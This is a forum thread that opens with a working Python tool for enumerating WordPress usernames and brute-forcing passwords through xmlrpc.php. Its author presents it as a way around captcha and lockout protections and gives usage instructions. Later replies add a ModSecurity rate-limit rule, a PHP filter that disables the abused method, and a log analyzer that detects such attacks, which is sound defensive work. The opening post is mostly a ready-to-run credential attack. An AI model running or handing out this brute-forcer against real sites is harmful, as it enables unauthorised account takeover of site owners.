dancezar

xmlrpc wordpress bruteforce

Posted (edited)


import urllib2
import Queue
import threading,sys

useri=[]
passwd=[]
url=""
work=0
stiva=Queue.Queue()
stiva_us=Queue.Queue()

def login(domain,user,passs):
    xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>"
    re=urllib2.Request(domain,xml_post)
    try:
        ur=urllib2.urlopen(re)
        html=ur.read()
        if "Incorrect username" in html:
            return 0
        elif "isAdmin" in html:
            return 1
        elif "requested method " in html:
            print "[+] Modulul wp.getUsersBlogs e blocat!"
            exit()
        else:
            print "[!] unknow response"
            exit()
    except urllib2.URLError,e:
        print "[!] Erroare HTTP "+e.code()
        exit()

def enum(j):
    global work,stiva,url,useri
    while work==1:
        try:
            i=stiva.get(False)
            try:
                r=urllib2.Request(url+"?author="+str(i))
                u=urllib2.urlopen(r)
                redirect=u.geturl()
                if "/author/" in redirect:
                    splited=redirect.split("/author/")
                    us=splited[1].replace("/","")
                    if us not in useri:
                        useri.append(us)
                        print us
            except urllib2.URLError,e:
                a=1
            if stiva.empty():
                return 0
        except Queue.Empty:
            pass
        else:
            stiva.task_done()

def brute(j):
    global bad,stiva_us,url,work
    while work==1:
        try:
            creds=stiva_us.get(False)
            rez=login(url,creds[0],creds[1])
            print str(creds[0])+" "+str(creds[1])
            if rez==1:
                print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1])
                work=0
        except Queue.Empty:
            pass
        else:
            stiva_us.task_done()

url=sys.argv[1]
passwd=open(sys.argv[3]).read().splitlines()
th=[]
th_br=[]
work=1
for i in range(4):
    t=threading.Thread(target=enum,args=(1,))
    th.append(t)
    t.start()
for i in range(12):
    stiva.put(i)
for i in th:
    i.join()
if len(useri)>0:
    print "[+] Am terminat de enumerat useri:"+str(len(useri))
    print "[+] Incep bruteforce"
else:
    print "[-] Nu s-au gasit useri voi incerca cu lista de useri"
    users=open(sys.argv[2]).read().splitlines()
    for user in users:
        useri.append(user)
    print "[+] Incep bruteforce"
print "[+] Testez daca exista xmlrpc.php"
r=urllib2.Request(url+"/xmlrpc.php")
try:
    ur=urllib2.urlopen(r)
except urllib2.URLError,e:
    print "[!] "+e.code()+" xmlrpc nu exista!"
    exit()
work=1
url+="/xmlrpc.php"
for us in useri:
    for p in passwd:
        stiva_us.put((us,p))
for t in range(int(sys.argv[4])):
    thr=threading.Thread(target=brute,args=(1,))
    th_br.append(thr)
    thr.start()
for t_j in th_br:
    t_j.join()
print "[+] EXIT!"


I needed a bruteforcer for WordPress that would get past protections such as captcha or lockouts after repeated attempts. I remembered an article that presented this concept and set out to write a bruteforcer in Python (I'm not very talented at Python, I only started 3 months ago). First it will try to enumerate users (this still needs work: it doesn't extract the user from the page title, only from the redirect), and then it will do the bruteforce.


python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS

Userlist.txt is needed when it fails to enumerate users.

I tried it on 2 sites where I already knew the password and on localhost, and it worked. :)

Edited by danyweb09
Posted
SecRule REQUEST_LINE "POST .*xmlrpc.*" "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog....."

etc.

oops :)

I understand that's a maximum of 600 POST requests to xmlrpc, which is about enough to do a quick bruteforce; the only sure way to avoid this is:


<?php

add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

function Remove_Unneeded_XMLRPC( $methods ) {
    unset( $methods['wp.getUsersBlogs'] );
    return $methods;
}

?>
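Both replies above leave the detection side implicit: the ModSecurity rule counts POSTs to xmlrpc.php per source IP, and the first post's enumeration step shows up as a run of `?author=N` requests before the XML-RPC traffic starts. The following is an added example written for this thread (not code from either poster, and not part of WordPress or ModSecurity) that applies the same two signals to a web server access log after the fact. It assumes the Apache/nginx "combined" log format, uses constructed sample lines (TEST-NET addresses, not real traffic), and the thresholds are placeholders to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "Combined" access log format (assumed); only the fields needed below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# Author-id enumeration probes: GET /?author=1, /?author=2, ...
AUTHOR_PROBE_RE = re.compile(r'^/(?:index\.php)?\?author=\d+$')


def parse_line(line):
    """Parse one combined-format line; return a dict (ts as aware datetime) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyze(lines, window=timedelta(seconds=600), xmlrpc_threshold=10, author_threshold=3):
    """Flag source IPs by XML-RPC POST rate (sliding window) and ?author= probe count.

    Returns {ip: {"max_xmlrpc_posts_in_window": int, "author_probes": int, "flagged": bool}}.
    """
    events = [r for r in map(parse_line, lines) if r]
    events.sort(key=lambda r: r["ts"])
    posts = defaultdict(deque)   # ip -> timestamps of POST /xmlrpc.php inside the current window
    peak = defaultdict(int)      # ip -> largest number of POSTs seen in any single window
    author_probes = defaultdict(int)
    for r in events:
        ip = r["ip"]
        if r["method"] == "POST" and r["path"].endswith("/xmlrpc.php"):
            q = posts[ip]
            q.append(r["ts"])
            while r["ts"] - q[0] > window:   # drop timestamps that fell out of the window
                q.popleft()
            peak[ip] = max(peak[ip], len(q))
        elif r["method"] == "GET" and AUTHOR_PROBE_RE.match(r["path"]):
            author_probes[ip] += 1
    report = {}
    for ip in set(peak) | set(author_probes):
        report[ip] = {
            "max_xmlrpc_posts_in_window": peak[ip],
            "author_probes": author_probes[ip],
            "flagged": peak[ip] >= xmlrpc_threshold or author_probes[ip] >= author_threshold,
        }
    return report


def _line(ip, ts, method, path, status, ua):
    # Helper to build constructed sample lines in combined format.
    return '%s - - [%s +0000] "%s %s HTTP/1.1" %s 412 "-" "%s"' % (ip, ts, method, path, status, ua)


# Constructed sample log: one source probing author ids then hammering xmlrpc.php,
# and one legitimate pingback client. Addresses are documentation ranges, not real hosts.
SAMPLE_LOG = (
    [_line("203.0.113.7", "10/Mar/2014:12:00:0%d" % i, "GET", "/?author=%d" % i, 301, "Python-urllib/2.7")
     for i in range(1, 4)]
    + [_line("203.0.113.7", "10/Mar/2014:12:00:%02d" % (10 + i), "POST", "/xmlrpc.php", 200, "Python-urllib/2.7")
       for i in range(12)]
    + [_line("198.51.100.4", "10/Mar/2014:12:00:09", "POST", "/xmlrpc.php", 200, "WordPress/3.8; pingback"),
       _line("198.51.100.4", "10/Mar/2014:12:30:00", "GET", "/", 200, "Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, info in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, info)
```

Feeding a real log is `analyze(open("access.log"))`. The per-window peak is what the ModSecurity counter approximates in real time; keeping the `?author=` probe count separate matters because that enumeration happens before any XML-RPC POST, so it is the earlier signal.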
